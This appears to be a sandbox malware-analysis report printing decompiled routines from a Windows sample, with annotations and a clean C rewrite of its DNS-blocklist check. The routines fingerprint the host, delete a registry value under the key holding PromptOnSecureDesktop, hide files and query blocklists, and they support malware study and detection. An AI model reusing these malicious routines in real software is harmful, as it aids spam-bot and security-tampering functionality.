                                                                                					_t43 =  *((intOrPtr*)(_t26 + 0x34));
                                                                                					_t39 = 0;
                                                                                					if(_t43 <= 0) {
                                                                                						goto L10;
                                                                                					} else {
                                                                                						goto L9;
                                                                                					}
                                                                                					do {
                                                                                						L9:
                                                                                						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
                                                                                						_t39 = _t39 + 1;
                                                                                					} while (_t39 < _t43);
                                                                                					L10:
                                                                                					_t26 =  *((intOrPtr*)(_t26 + 8));
                                                                                				} while (_t26 != 0);
                                                                                				goto L11;
                                                                                			}

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                • API String ID: 2574300362-1087626847
                                                                                • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 020876D9
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0208796D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0208797E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumOpen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1332880857-2980165447
                                                                                • Opcode ID: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                • Instruction ID: 3aa7920e38aeb8f5dc3b253b6c4c272fcea1656b35d38f6cf5b03703f271298b
                                                                                • Opcode Fuzzy Hash: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                • Instruction Fuzzy Hash: 8611DC70A00209AFDB12AFA9DC44FEFBFB9EB91314F240161F551E62A4E3B08950DB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E00401BDF() {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				void* _v27;
                                                                                				char _v28;
                                                                                				void* _t14;
                                                                                				signed int _t21;
                                                                                				signed int _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_v28 = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosw");
                                                                                				_t30 = 0;
                                                                                				_v12 = 0;
                                                                                				asm("stosb");
                                                                                				_v8 = 0xf;
                                                                                				_t14 = E00401AC3();
                                                                                				if(_t14 == 0) {
                                                                                					if(GetComputerNameA( &_v28,  &_v8) == 0) {
                                                                                						L6:
                                                                                						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
                                                                                						return _v12;
                                                                                					}
                                                                                					_t21 = 0;
                                                                                					if(_v8 <= 0) {
                                                                                						goto L6;
                                                                                					} else {
                                                                                						goto L3;
                                                                                					}
                                                                                					do {
                                                                                						L3:
                                                                                						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
                                                                                						_t21 = _t21 + 1;
                                                                                					} while (_t21 < _v8);
                                                                                					if(_t30 == 0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					return _t30;
                                                                                				}
                                                                                				return _t14;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: hi_id$localcfg
                                                                                • API String ID: 2777991786-2393279970
                                                                                • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E004096FF(void* __ecx) {
                                                                                				void* _v8;
                                                                                				char* _t6;
                                                                                				char* _t10;
                                                                                				void* _t23;
                                                                                				void* _t24;
                                                                                
                                                                                				_t16 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_t6 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                				_t24 = _t23 + 0x14;
                                                                                				if(RegOpenKeyExA(0x80000001, _t6, 0, 0x103,  &_v8) == 0) {
                                                                                					_t10 = E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8);
                                                                                					_t24 = _t24 + 0x14;
                                                                                					RegDeleteValueA(_v8, _t10);
                                                                                					RegCloseKey(_v8);
                                                                                				}
                                                                                				E0040EE2A(_t16, 0x4122f8, 0, 0x100);
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
                                                                                • RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
                                                                                • RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValue
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 849931509-2980165447
                                                                                • Opcode ID: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
                                                                                • Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
                                                                                • Opcode Fuzzy Hash: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
                                                                                • Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0208999D
                                                                                • RegDeleteValueA.ADVAPI32(?,00000000), ref: 020899BD
                                                                                • RegCloseKey.ADVAPI32(?), ref: 020899C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValue
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 849931509-2980165447
                                                                                • Opcode ID: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                • Instruction ID: fd83014183e0f56e3d990b065027e0b32d58bd00216c49600da3c46b88e24f73
                                                                                • Opcode Fuzzy Hash: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                • Instruction Fuzzy Hash: 6AF0F6B2680218BFF7117B55EC06FDF3A2CDB94B14F100060FA45B5081F6E59A9096B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg$u6A
                                                                                • API String ID: 1594361348-1940331995
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: 9faf818588b09c7dd415d233e9ad87b8e3038c083b23a76e77bddff0786243d5
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: 4BE0C230605251DFCB81AB2CF848AC637E4EF0A230F008180F8C0C31A0CB34DCC0A740
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 020869E5
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 02086A26
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 02086A3A
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 02086BD8
                                                                                  • Part of subcall function 0208EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02081DCF,?), ref: 0208EEA8
                                                                                  • Part of subcall function 0208EE95: HeapFree.KERNEL32(00000000), ref: 0208EEAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                • String ID:
                                                                                • API String ID: 3384756699-0
                                                                                • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction ID: 6543dae48372f8aac3f293bc485867bc7e60c65d638edd194f6fb80bd77aa19d
                                                                                • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction Fuzzy Hash: 8671377190021DEFDF11EFA4CC81AEEBBB9FB04318F10456AE555A6290D7319E92EB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401C5F(void* __eflags) {
                                                                                				// Two values reach this function through the stack frame (_t105 = _t107 - 0x70):
                                                                                				// the dword at _t105+0x78 is an IPv4 address and _t105+0x7c points at a
                                                                                				// comma-separated list of DNS zones. The zone-list slot is then reused as the
                                                                                				// zone index. The return value is a bitmask with bit i set when the name built
                                                                                				// for zone i passes E00402684, whose body is not shown in this section.
                                                                                				signed int _t49;
                                                                                				signed int _t51;
                                                                                				void* _t80;
                                                                                				char _t91;
                                                                                				void* _t92;
                                                                                				signed int _t98;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t103;
                                                                                				void* _t105;
                                                                                				void* _t107;
                                                                                				void* _t108;
                                                                                
                                                                                				_t105 = _t107 - 0x70;
                                                                                				_t108 = _t107 - 0x114;
                                                                                				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;    // result bitmask = 0
                                                                                				_t98 =  *(_t105 + 0x7c);                              // cursor into the zone list
                                                                                				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;    // zone index = 0
                                                                                				_t101 = E0040ED03(_t98, 0x2c);                        // strchr-like by its use: next ',' (0x2c) or 0
                                                                                				if(_t101 == 0) {
                                                                                					L6:                                               // last (or only) zone: no comma left
                                                                                					_t49 = _t98;
                                                                                					_t32 = _t49 + 1; // 0x2
                                                                                					_t102 = _t32;
                                                                                					do {                                              // inline strlen
                                                                                						_t91 =  *_t49;
                                                                                						_t49 = _t49 + 1;
                                                                                					} while (_t91 != 0);
                                                                                					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;   // NUL-terminate the zone buffer
                                                                                					_t51 = _t98;
                                                                                					_t35 = _t51 + 1; // 0x2
                                                                                					_t103 = _t35;
                                                                                					do {                                              // inline strlen, a second time
                                                                                						_t92 =  *_t51;
                                                                                						_t51 = _t51 + 1;
                                                                                					} while (_t92 != 0);
                                                                                					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);     // memcpy-like (dst, src, len): zone text into a fixed-size stack buffer
                                                                                					// "%u.%u.%u.%u.%s" with the address bytes in descending order (byte 3 first).
                                                                                					// For an in_addr in network byte order that is d.c.b.a.<zone>, the
                                                                                					// reversed-octet form used for DNS blocklist lookups.
                                                                                					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
                                                                                					if(E00402684(_t105 - 0xa4) != 0) {
                                                                                						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);   // set the bit for this zone
                                                                                					}
                                                                                					L12:
                                                                                					return  *(_t105 + 0x6c);
                                                                                				}
                                                                                				// Several zones: hoist the four address bytes into locals once.
                                                                                				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;    // byte 0
                                                                                				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;    // byte 1
                                                                                				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;    // byte 2
                                                                                				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;    // byte 3
                                                                                				while(1) {
                                                                                					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;    // NUL at the comma offset
                                                                                					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);     // copy this zone (length = comma - start)
                                                                                					_t22 = _t101 + 1; // 0x1
                                                                                					_t98 = _t22;                                      // advance past the comma
                                                                                					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);   // byte3.byte2.byte1.byte0.<zone>, as above
                                                                                					_t80 = E00402684(_t105 - 0xa4);
                                                                                					_t108 = _t108 + 0x2c;                             // drop the 0x2c bytes of arguments pushed for the three calls above
                                                                                					if(_t80 != 0) {
                                                                                						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);   // set the bit for this zone
                                                                                					}
                                                                                					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;         // next zone index
                                                                                					if( *(_t105 + 0x7c) > 0x1e) {                     // stop after 31 zones (bits 0..30)
                                                                                						goto L12;
                                                                                					}
                                                                                					_t101 = E0040ED03(_t98, 0x2c);                    // next ','
                                                                                					if(_t101 != 0) {
                                                                                						continue;
                                                                                					}
                                                                                					goto L6;                                          // no comma left: handle the final zone
                                                                                				}
                                                                                				goto L12;
                                                                                			}
                                                                                Instruction addresses of the decompiled lines above: 0x00401c60 .. 0x00401d95

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                • API String ID: 2111968516-120809033
                                                                                • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
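
The function above is easier to reason about in clean form. What follows is an added example, written for this page and not the sample's code nor part of the Joe Sandbox report: a portable C re-implementation of the zone walk and name building seen in E00401C5F. It assumes the address dword is an in_addr in network byte order (as the gethostbyname/inet_addr routine listed earlier on the page suggests), replaces the sample's resolver call (E00402684, not shown here) with a constructed lookup table over made-up zones under example.net/.com/.org, and uses the documentation address 203.0.113.7. The names dnsbl_query_name, dnsbl_check, example_listed, EXAMPLE_ADDR_NBO and EXAMPLE_ZONES are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The sample stops once the zone index exceeds 0x1e, i.e. after 31 zones. */
#define MAX_ZONES 31

/* Build "d.c.b.a.<zone>" from an IPv4 address held as an in_addr-style
 * dword in network byte order (low byte = first octet on a little-endian
 * host), the reversed-octet form used for DNS blocklist lookups. The zone
 * is passed as pointer + length so it can be sliced out of a list without
 * copying. Returns 0 on success, -1 if the name does not fit in out. */
int dnsbl_query_name(char *out, size_t outlen, uint32_t addr_nbo,
                     const char *zone, size_t zonelen)
{
    unsigned a = addr_nbo & 0xffu;
    unsigned b = (addr_nbo >> 8) & 0xffu;
    unsigned c = (addr_nbo >> 16) & 0xffu;
    unsigned d = (addr_nbo >> 24) & 0xffu;
    int n = snprintf(out, outlen, "%u.%u.%u.%u.%.*s", d, c, b, a,
                     (int)zonelen, zone);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Resolver hook. The sample hands the name to an internal routine
 * (E00402684, not shown on this page); any predicate on the name fits. */
typedef int (*is_listed_fn)(const char *name);

/* Walk a comma-separated zone list, query each zone and return a bitmask
 * with bit i set when the address is listed in zone i. As in the sample,
 * at most MAX_ZONES zones are consulted, so bit 30 is the highest set. */
uint32_t dnsbl_check(uint32_t addr_nbo, const char *zones, is_listed_fn listed)
{
    uint32_t mask = 0;
    const char *p = zones;
    for (unsigned i = 0; i < MAX_ZONES && *p != '\0'; i++) {
        const char *comma = strchr(p, ',');
        size_t len = comma ? (size_t)(comma - p) : strlen(p);
        char name[256];
        if (dnsbl_query_name(name, sizeof name, addr_nbo, p, len) == 0 &&
            listed(name))
            mask |= 1u << i;
        if (comma == NULL)
            break;              /* final zone handled, like the sample's L6 path */
        p = comma + 1;
    }
    return mask;
}

/* Constructed stand-in for DNS answers: the names that "resolve", i.e. the
 * address is listed there. Example zones only, not real blocklist data. */
static const char *const kListedNames[] = {
    "7.113.0.203.bl.example.net",
    "7.113.0.203.xbl.example.org",
};

int example_listed(const char *name)
{
    for (size_t i = 0; i < sizeof kListedNames / sizeof kListedNames[0]; i++)
        if (strcmp(kListedNames[i], name) == 0)
            return 1;
    return 0;
}

/* 203.0.113.7 as an in_addr dword on a little-endian host: bytes CB 00 71 07
 * in memory, so the value reads back as 0x077100CB. */
#define EXAMPLE_ADDR_NBO 0x077100CBu
#define EXAMPLE_ZONES "bl.example.net,dnsbl.example.com,xbl.example.org"

int main(void)
{
    uint32_t mask = dnsbl_check(EXAMPLE_ADDR_NBO, EXAMPLE_ZONES, example_listed);
    printf("listed mask: 0x%x\n", (unsigned)mask);   /* 0x5: zones 0 and 2 */
    return 0;
}
```

The names this builder produces are exactly what DNS telemetry records when the real sample runs, so the same format doubles as a hunting pattern: one client resolving `<reversed-ip>.<zone>` for many different zones in quick succession.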

                                                                                C-Code - Quality: 100%
                                                                                			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                				// Blocking write over a handle opened for overlapped I/O: _a4 = handle,
                                                                                				// _a8 = buffer, _a12 = byte count, _a16 = event handle placed in the
                                                                                				// OVERLAPPED (the slot is then reused as the bytes-written count),
                                                                                				// _a20 = timeout in milliseconds. Returns 1 only when all _a12 bytes went out.
                                                                                				struct _OVERLAPPED _v24;
                                                                                				long _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_v24.Offset = _v24.Offset & 0x00000000;          // file offset 0 (ignored for pipes and sockets)
                                                                                				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                				_t30 = _a12;                                     // requested length
                                                                                				_t31 = _a16;                                     // event handle
                                                                                				_a16 = _a16 & 0x00000000;                        // reuse the slot as lpNumberOfBytesWritten
                                                                                				_v24.hEvent = _t31;
                                                                                				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {   // completed synchronously
                                                                                					L3:
                                                                                					if(_t30 != _a16) {                           // a short write counts as failure
                                                                                						L5:
                                                                                						return 0;
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                				if(GetLastError() != 0x3e5) {                    // 0x3e5 = ERROR_IO_PENDING; anything else is a real error
                                                                                					goto L5;
                                                                                				}
                                                                                				WaitForSingleObject(_t31, _a20);                 // wait up to _a20 ms on the event; the wait result is not checked
                                                                                				// bWait = 0: if the wait timed out the operation is still in flight, this call
                                                                                				// fails with ERROR_IO_INCOMPLETE and the function returns 0 while the I/O
                                                                                				// remains outstanding against the stack-allocated _v24.
                                                                                				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L3;
                                                                                			}
                                                                                Instruction addresses of the decompiled lines above: 0x00403f1e .. 0x00403f86

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                • GetLastError.KERNEL32 ref: 00403F4E
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                				struct _OVERLAPPED _v24;
                                                                                				long _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                				_t30 = _a12;
                                                                                				_t31 = _a16;
                                                                                				_a16 = _a16 & 0x00000000;
                                                                                				_v24.hEvent = _t31;
                                                                                				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                					L3:
                                                                                					if(_t30 != _a16) {
                                                                                						L5:
                                                                                						return 0;
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                				if(GetLastError() != 0x3e5) {
                                                                                					goto L5;
                                                                                				}
                                                                                				WaitForSingleObject(_t31, _a20);
                                                                                				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L3;
			}

• Statement addresses (one per C-code line above, 0x00000000 where a line has no instruction): 0x00403f92 0x00403f96 0x00403f9b 0x00403f9f 0x00403fa2 0x00403fb2 0x00403fc0 0x00403ff0 0x00403ff3 0x00403ffa 0x00000000 0x00403ffa 0x00000000 0x00403ff7 0x00403fcd 0x00000000 0x00000000 0x00403fd3 0x00403fee 0x00000000 0x00000000 0x00000000

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                • GetLastError.KERNEL32 ref: 00403FC2
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 020841AB
                                                                                • GetLastError.KERNEL32 ref: 020841B5
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 020841C6
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 020841D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: 84ab2b3d483db2de3ddd0446ba7fcca05cf9655ab7f64e9b7cb64f8a249f7f82
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: 9501CC7651120AAFDF01EF91ED84BEF7BACEB18255F104061F901E2050D774DA549BB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0208421F
                                                                                • GetLastError.KERNEL32 ref: 02084229
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 0208423A
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0208424D
                                                                                Memory Dump Source
